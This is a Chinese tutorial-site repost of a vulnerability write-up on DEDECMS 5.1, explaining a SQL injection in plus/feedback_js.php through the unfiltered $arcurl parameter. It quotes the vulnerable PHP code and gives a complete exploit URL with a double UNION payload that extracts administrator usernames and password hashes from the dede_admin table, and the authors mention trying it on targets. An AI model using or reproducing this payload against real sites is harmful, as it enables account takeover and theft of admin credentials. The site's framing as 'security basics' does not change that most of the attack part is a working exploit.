明辉手游网中心:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

文章发布
全站
软 件 文 章
热门搜索:爱奇艺视频 好友 流量 会员 1分钱 字幕 
资讯首页腾讯视频 爱奇艺 暴风影音 酷狗音乐 酷我音乐影音大全软件下载软件教程电脑系统下载
聊天工具办公软件杀毒教程系统工具图形图像电脑学习应用软件网络软件苹果应用注册码网站教程技术开发安卓教程其它教程
您当前所在位置:网视手游站 -> 杀毒教程 -> DEDECMS 5.1 feedback_js.php 0DAY

DEDECMS 5.1 feedback_js.php 0DAY

发表时间:2023-04-20 来源:明辉站整理相关软件相关文章人气:

[摘要]作者:st0p&Rainy'Fox 同样是在magic_quotes_gpc=off的情况下可用漏洞版本:DEDECMS 5.1 此漏洞可拿到后台管理员的帐号和加密HASH,漏洞...

作者:st0p&Rainy'Fox

同样是在magic_quotes_gpc=off的情况下可用

漏洞版本:DEDECMS 5.1

此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl

......

$urlindex = 0;

if(empty($arcID))

{

 $row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");

       //此处$arcurl没有过滤

 if(is_array($row)) $urlindex = $row['id'];

      //存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了

}

if(empty($arcID) && empty($urlindex)) exit();

//如果$arcID为空或$urlindex为空则退出

......

if(empty($arcID)) $wq = " urlindex = '$urlindex' ";

//我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了.

else $wq = " aid='$arcID' ";

 $querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";

$dlist->Init();

$dlist->SetSource($querystring);

看一下利用方法吧,嘿,为了闭合我用了两次union

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

javascript:contentimage(this);>

唉,偶和Rainy'Fox这家伙找目标测试的时候,他竟然说能不能在magic_quotes_gpc=on时通过....这种想法太YD了..也太可怕了,要真可以实现,这个网络界又该乱了,好多程序都是在PHP默认magic_quotes_gpc为关闭时才会调用自身的转义部分...要真能实现,那就是PHP程序的恶梦了...


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。




标签:DEDECMS 5.1 feedback_js.php 0DAY 

推荐资讯 总人气榜

最新教程 本月人气

联系我们|版权声明|下载帮助|关于我们|网站地图|手机站
Copyright © 2015-2020 www.22122511.com AllRights Reserved

本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!